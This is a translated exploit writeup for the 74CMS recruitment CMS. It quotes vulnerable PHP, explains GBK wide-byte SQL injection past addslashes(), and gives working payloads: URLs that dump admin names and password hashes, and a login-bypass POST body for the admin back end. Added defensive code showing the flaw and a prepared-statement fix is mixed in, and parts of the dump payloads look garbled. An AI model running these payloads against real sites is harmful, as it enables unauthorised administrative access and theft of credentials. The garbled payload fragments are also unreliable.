74CMS (Qishi talent system) injection (gets you into the admin back end)

Source: Internet
Author: User

The whole program is filtered thoroughly. All versions use GBK encoding, which on its own would be easy to break, but before a string is stored in the database the author uses iconv to convert the submitted data from GBK to UTF-8.

So wide-character injection is normally out, and we have to hunt for the places where the filtering is incomplete. In the latest versions before 3.2 the plus directory has gained a few extra files; I don't know whether a programmer... let's start with two silly ones ~
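The order of operations described above is the whole story: escaping a raw GBK value with addslashes() and converting it to UTF-8 afterwards leaves the quote unescaped, because the added backslash (0x5C) becomes the trail byte of a two-byte GBK character. The following is an added example, not 74CMS code; the input bytes are constructed, and the function names are mine. It shows the vulnerable order beside the safe one (validate and convert first, then escape) and a small check a reviewer can use to see whether a quote survived.

```php
<?php
// Added example, not 74CMS code. Demonstrates why addslashes() followed by a
// GBK -> UTF-8 conversion leaves a single quote unescaped, and why converting
// (and validating) before escaping does not. All inputs are constructed.

// Constructed GBK request value: "11", a lone high byte 0xD5, a quote, a tail.
const CONSTRUCTED_INPUT = "11\xd5' or 1=1#";
// Constructed *valid* GBK value ("Beijing" in GBK) with a trailing quote.
const CONSTRUCTED_VALID_GBK = "\xb1\xb1\xbe\xa9'";

/** Vulnerable order: escape the raw GBK bytes, then convert to UTF-8. */
function escape_then_convert(string $gbkInput): string
{
    // addslashes() turns 0x27 into 0x5C 0x27, so the buffer now holds ... D5 5C 27 ...
    $escaped = addslashes($gbkInput);
    // D5 5C is a valid two-byte GBK character: the converter consumes the backslash
    // as its trail byte and the following 0x27 survives as a bare quote.
    return iconv('GBK', 'UTF-8//IGNORE', $escaped);
}

/** Safe order: reject undecodable input, convert to UTF-8, then escape the UTF-8 string. */
function convert_then_escape(string $gbkInput): string
{
    if (!mb_check_encoding($gbkInput, 'GBK')) {
        // 0xD5 followed by 0x27 is not a legal GBK pair; refuse it instead of
        // silently dropping bytes and hoping the result is harmless.
        throw new InvalidArgumentException('request value is not valid GBK');
    }
    $utf8 = mb_convert_encoding($gbkInput, 'UTF-8', 'GBK');
    return addslashes($utf8); // every quote is now preceded by a real backslash
}

/** True if $s contains a single quote that is not preceded by a backslash. */
function has_unescaped_quote(string $s): bool
{
    return (bool) preg_match("/(?<!\\\\)'/", $s);
}

/** Runs both orders over the constructed inputs and returns a small report. */
function demo(): array
{
    $report = [];
    $report['vulnerable_order_quote_survives'] =
        has_unescaped_quote(escape_then_convert(CONSTRUCTED_INPUT)); // true
    try {
        convert_then_escape(CONSTRUCTED_INPUT);
        $report['safe_order_rejects_bad_bytes'] = false;
    } catch (InvalidArgumentException $e) {
        $report['safe_order_rejects_bad_bytes'] = true;                // true
    }
    $report['safe_order_escapes_valid_gbk'] =
        !has_unescaped_quote(convert_then_escape(CONSTRUCTED_VALID_GBK)); // true
    return $report;
}

foreach (demo() as $check => $ok) {
    printf("%-35s %s\n", $check, $ok ? 'yes' : 'no');
}
```

Binding the value as a query parameter removes the question entirely; where escaping must stay, the charset the escaping function assumes has to match the bytes it is given, which is exactly what the escape-then-convert order breaks.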


Injection 1:

\plus\ajax_officebuilding.php (line 16)

if ($act == 'alphabet')
{
    $alphabet = trim($_GET['x']); // smile, this is definitely a programmer.
    if (!empty($alphabet))
    {
        $result = $db->query("SELECT * FROM " . table('category') . " WHERE c_alias = 'QS_officebuilding' AND c_index = '{$alphabet}'"); // smile
        while ($row = $db->fetch_array($result))
        {
            if ($listtype == "li")
            {
                $htm .= "<li title=\"{$row['c_name']}\" id=\"{$row['c_id']}\">{$row['c_name']}</li>";
            }
            else
            {
                $htm .= "<li><a href=\"?officebuildingid={$row['c_id']}\" title=\"{$row['c_note']}\" class=\"vtip\">{$row['c_name']}</a><span>{$row['stat_job']}</span></li>";
            }
        }
        if (empty($htm))
        {
            $htm = "<span class=\"noinfo\">No office building with the initial letter <span>{$alphabet}</span> was found!</span>";
        }
        $htm .= "<script type=\"text/javascript\">vtip();</script>";
        exit($htm);
    }
}

Injection 2: \plus\ajax_street.php (line 16)

if ($act == 'alphabet')
{
    $alphabet = trim($_GET['x']); // almost the same as the injection above.
    if (!empty($alphabet))
    {
        $result = $db->query("SELECT * FROM " . table('category') . " WHERE c_alias = 'QS_street' AND c_index = '{$alphabet}'"); // smile
        while ($row = $db->fetch_array($result))
        {
            if ($listtype == "li")
            {
                $htm .= "<li title=\"{$row['c_name']}\" id=\"{$row['c_id']}\">{$row['c_name']}</li>";
            }
            else
            {
                $htm .= "<li><a href=\"?streetid={$row['c_id']}\" title=\"{$row['c_note']}\" class=\"vtip\">{$row['c_name']}</a><span>{$row['stat_job']}</span></li>";
            }
        }
        if (empty($htm))
        {
            $htm = "<span class=\"noinfo\">No street with the initial letter <span>{$alphabet}</span> was found!</span>";
        }
        exit($htm);
    }
}
Exploit:

1. plus/ajax_officebuilding.php?act=alphabet&x=11%d5'%20union%20select%,,2,3,concat(0x3C2F613E20),5,6,7,concat(Region,admin_name,0x3A,pwd,0x3C623E205E5F5E3C2F623E),9%20from%20qs_admin%23

2. plus/ajax_street.php?act=alphabet&x=11%d5'%20union%20select%,,2,3,concat(0x3C2F613E20),5,6,7,concat(Clerk,admin_name,0x3A,pwd,0x3C623E205E5F5E3C2F623E),9%20from%20qs_admin%23

Anyone who has read this program knows that the injection alone is useless, because the hashes cannot be cracked. I did not look closely at how the passwords are hashed; in any case they are hashed several times over, and I could not crack a dozen or so of them....

So it is not much use on its own. Still, this is a white-box review, isn't it? I then batch-searched for dangerous functions, variable execution and file writes, and found nothing to work with. I turned to the admin back end instead and immediately smiled ~ ~

\admin\admin_login.php (line 42)

elseif ($act == 'do_login')
{
    header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
    header("Cache-Control: no-cache, must-revalidate");
    header("Pragma: no-cache");
    $admin_name  = isset($_POST['admin_name']) ? trim($_POST['admin_name']) : ''; // not filtered ~~~
    $admin_pwd   = isset($_POST['admin_pwd']) ? trim($_POST['admin_pwd']) : '';
    $postcaptcha = isset($_POST['postcaptcha']) ? $_POST['postcaptcha'] : '';
    $remember    = isset($_POST['rememberme']) ? intval($_POST['rememberme']) : 0;

    if ($admin_name == '')
    {
        header("Location: ?act=login&err=" . urlencode('User name cannot be blank'));
        exit();
    }
    elseif ($admin_pwd == '')
    {
        header("Location: ?act=login&err=" . urlencode('Password cannot be blank'));
        exit();
    }
    $captcha = get_cache('captcha');
    if (empty($postcaptcha) && $captcha['verify_adminlogin'] == '1')
    {
        header("Location: ?act=login&err=" . urlencode('Verification code cannot be blank'));
        exit();
    }
    if ($captcha['verify_adminlogin'] == '1' && strcasecmp($_SESSION['imagecaptcha_content'], $postcaptcha) != 0)
    {
        write_log("<span style=\"color:#FF0000\">Incorrect verification code</span>", $admin_name, 2);
        header("Location: ?act=login&err=" . urlencode('Verification code filled in incorrectly'));
        exit();
    }
    elseif (check_admin($admin_name, $admin_pwd)) // the key function is called with the raw name.
    {
        update_admin_info($admin_name);
        write_log("Logged in successfully", $admin_name);
        if ($remember == 1)
        {
            $admininfo = get_admin_one($admin_name);
            setcookie('QISHI[admin_id]', $_SESSION['admin_id'], time() + 86400, $QS_cookiepath, $QS_cookiedomain);
            setcookie('QISHI[admin_name]', $admin_name, time() + 86400, $QS_cookiepath, $QS_cookiedomain);
            setcookie('QISHI[admin_pwd]', md5($admin_name . $admininfo['pwd'] . $admininfo['pwd_hash'] . $QS_pwdhash), time() + 86400, $QS_cookiepath, $QS_cookiedomain);
        }
    }
    else
    {
        write_log("<span style=\"color:#FF0000\">Incorrect user name or password</span>", $admin_name, 2);
        header("Location: ?act=login&err=" . urlencode('User name or password error'));
        exit();
    }
    header("Location: admin_index.php");
}
Now follow the check_admin function: \admin\include\admin_common.fun.php (line 197)

function check_admin($name, $pwd)
{
    global $db, $QS_pwdhash;

    $admin = get_admin_one($name); // the submitted name goes straight into this function for a query.
    $md5_pwd = md5($pwd . $admin['pwd_hash'] . $QS_pwdhash);
    $row = $db->getone("SELECT COUNT(*) AS num FROM " . table('admin') . " WHERE admin_name = '$name' AND pwd = '" . $md5_pwd . "'"); // and is queried again here
    if ($row['num'] > 0) {
        return true;
    } else {
        return false;
    }
}
Now the get_admin_one function: \admin\include\admin_common.fun.php (line 237)

function get_admin_one($username) {
    global $db;
    $sql = "SELECT * FROM " . table('admin') . " WHERE admin_name = '" . $username . "' LIMIT 1"; // queried directly
    return $db->getone($sql);
}
Both get_admin_one and check_admin splice the name straight into the query. The only protection is the addslashes applied to POST data at the start of the script, and that falls to wide characters ~~
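The root cause in both the admin login and the two plus/ajax_* files is the same: a request value is spliced into SQL text, so the outcome depends on whether an escaping layer and an encoding conversion happen to agree. The fix is to stop splicing. Below is an added rewrite of check_admin()/get_admin_one(), not 74CMS code: it assumes a mysqli connection with mysqlnd (for get_result()), the qs_admin columns the writeup shows (admin_name, pwd, pwd_hash) and the site salt $QS_pwdhash passed in as $siteSalt. The same prepared-statement pattern applies to the c_index lookups in ajax_officebuilding.php and ajax_street.php.

```php
<?php
// Added example, not 74CMS code. Binds the user name as a parameter instead of
// splicing it into SQL, so neither addslashes() nor the GBK/UTF-8 conversion
// order has any bearing on the query. Assumes mysqli + mysqlnd and the qs_admin
// columns named in the writeup (admin_name, pwd, pwd_hash).

function get_admin_one_safe(mysqli $db, string $username): ?array
{
    // Declare the connection charset so the driver and the data agree on encoding.
    $db->set_charset('utf8mb4');
    $stmt = $db->prepare(
        'SELECT admin_id, admin_name, pwd, pwd_hash FROM qs_admin WHERE admin_name = ? LIMIT 1'
    );
    $stmt->bind_param('s', $username); // value travels separately from the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

function check_admin_safe(mysqli $db, string $name, string $pwd, string $siteSalt): bool
{
    $admin = get_admin_one_safe($db, $name);
    if ($admin === null) {
        // Do equivalent hash work for unknown names so response time does not
        // reveal which admin names exist.
        md5($pwd . str_repeat('0', 32) . $siteSalt);
        return false;
    }
    // Keep the hash layout the page shows, md5(pwd . pwd_hash . QS_pwdhash), so
    // existing rows still verify; migrating to password_hash() is the better
    // long-term choice. The comparison happens in PHP with hash_equals(), not in
    // a second SQL WHERE clause built from the user name.
    $expected = md5($pwd . $admin['pwd_hash'] . $siteSalt);
    return hash_equals($admin['pwd'], $expected);
}

// Usage sketch inside the do_login branch (connection details assumed):
// $ok = check_admin_safe($mysqli, $admin_name, $admin_pwd, $QS_pwdhash);
// if (!$ok) { write_log("...", $admin_name, 2); header("Location: ?act=login&err=..."); exit(); }
```

With the name bound as a parameter, a value such as the %d5' prefix in the writeup is simply compared literally against admin_name and matches nothing; the remember-me cookie branch should likewise use the row returned by get_admin_one_safe() rather than re-querying with the raw name.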

So... post the following body directly to admin_login.php?act=do_login and you are in the back end ~~ Of course, you have to know the back-end path first:

admin_name=fuckyou%d5' or 1=1%23&admin_pwd=1
Proof of vulnerability:


Solution:
Come on
Author: kiddie
